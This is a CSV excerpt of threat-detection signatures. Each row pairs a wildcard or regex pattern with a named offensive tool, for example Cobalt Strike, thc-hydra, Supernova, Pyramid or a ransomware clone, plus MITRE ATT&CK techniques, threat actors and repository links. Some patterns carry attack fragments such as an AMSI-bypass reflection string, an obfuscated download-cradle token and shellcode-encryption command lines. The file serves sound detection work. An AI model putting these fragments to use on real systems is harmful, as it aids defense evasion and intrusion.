"*./xhydra*",".{0,1000}\.\/xhydra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","4222"
"*./xrkRce *",".{0,1000}\.\/xrkRce\s.{0,1000}","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/sunlogin_rce","1","0","#linux","N/A","N/A","5","484","195","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z","4223"
"*./zabbix.py*",".{0,1000}\.\/zabbix\.py.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/pykiller/CVE-2022-23131","1","1","#linux","N/A","N/A","1","2","0","2022-02-24T11:59:48Z","2022-02-24T11:34:27Z","4224"
"*./zexp check -*",".{0,1000}\.\/zexp\scheck\s\-.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/jweny/zabbix-saml-bypass-exp","1","0","#linux","N/A","N/A","1","93","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z","4225"
"*.\""do`wnLO`ADS`TRinG\*",".{0,1000}\.\\\""do\`wnLO\`ADS\`TRinG\\.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","4226"
"*.\\pipe\\mimikatz*",".{0,1000}\.\\\\pipe\\\\mimikatz.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#namedpipe","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","4227"
"*.\dumpy.py*",".{0,1000}\.\\dumpy\.py.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","4228"
"*.\stager.ps1*",".{0,1000}\.\\stager\.ps1.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","4230"
"*.2miners.com*",".{0,1000}\.2miners\.com.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","4235"
"*.500.jasmin*",".{0,1000}\.500\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4236"
"*.ACEshark.log*",".{0,1000}\.ACEshark\.log.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","0","#logfile","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","4238"
"*.admin.123456.*",".{0,1000}\.admin\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4239"
"*.adminusers.txt*",".{0,1000}\.adminusers\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","N/A","3","226","31","2024-09-23T18:11:26Z","2022-12-30T23:35:40Z","4240"
"*.api.123456.*",".{0,1000}\.api\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4241"
"*.apps.123456.*",".{0,1000}\.apps\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4245"
"*.arsenal.json*",".{0,1000}\.arsenal\.json.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","4246"
"*.asp --adcs --template Machine -smb2support*",".{0,1000}\.asp\s\-\-adcs\s\-\-template\sMachine\s\-smb2support.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","4247"
"*.asreproast.txt*",".{0,1000}\.asreproast\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","N/A","3","226","31","2024-09-23T18:11:26Z","2022-12-30T23:35:40Z","4248"
"*.Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'*",".{0,1000}\.Assembly\.GetType\(\'System\.Management\.Automation\.AmsiUtils\'\)\.GetField\(\'amsiInitFailed\'.{0,1000}","offensive_tool_keyword","crackmapexec","amsibypass in crackmapexec and others","T1059.001 - T1562.001 - T1562.009","TA0005 - TA0040","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Defense Evasion","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","4250"
"*.athena_utils *",".{0,1000}\.athena_utils\s.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","4251"
"*.AzureAD.Application_Owners.csv*",".{0,1000}\.AzureAD\.Application_Owners\.csv.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4253"
"*.AzureAD.DeviceList_Owners.csv*",".{0,1000}\.AzureAD\.DeviceList_Owners\.csv.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4254"
"*.bashrc persistence setup successfully*",".{0,1000}\.bashrc\spersistence\ssetup\ssuccessfully.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","4256"
"*.beta.123456.*",".{0,1000}\.beta\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4257"
"*.bin -enc rc4 -lang c -k 3 -o *.bin*",".{0,1000}\.bin\s\-enc\src4\s\-lang\sc\s\-k\s3\s\-o\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","4259"
"*.bin -enc rc4 -lang csharp -k 9*",".{0,1000}\.bin\s\-enc\src4\s\-lang\scsharp\s\-k\s9.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","4260"
"*.bin -enc rot -lang csharp -k 2 -d*",".{0,1000}\.bin\s\-enc\srot\s\-lang\scsharp\s\-k\s2\s\-d.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","4261"
"*.bin -enc rot -lang rust -k 7*",".{0,1000}\.bin\s\-enc\srot\s\-lang\srust\s\-k\s7.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","4262"
"*.bin -enc xor -lang csharp -k 2 -v nickvourd*",".{0,1000}\.bin\s\-enc\sxor\s\-lang\scsharp\s\-k\s2\s\-v\snickvourd.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","4263"
"*.bin -enc xor -lang nim -k 4*",".{0,1000}\.bin\s\-enc\sxor\s\-lang\snim\s\-k\s4.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","4264"
"*.blog.123456.*",".{0,1000}\.blog\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4267"
"*.BruteRatel*",".{0,1000}\.BruteRatel.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4268"
"*.cobaltstrike*",".{0,1000}\.cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4270"
"*.cobaltstrike.beacon_keys*",".{0,1000}\.cobaltstrike\.beacon_keys.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","4271"
"*.cobaltstrike.beacon_keys*",".{0,1000}\.cobaltstrike\.beacon_keys.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","4272"
"*.cobaltstrike.beacon_keys*",".{0,1000}\.cobaltstrike\.beacon_keys.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","4273"
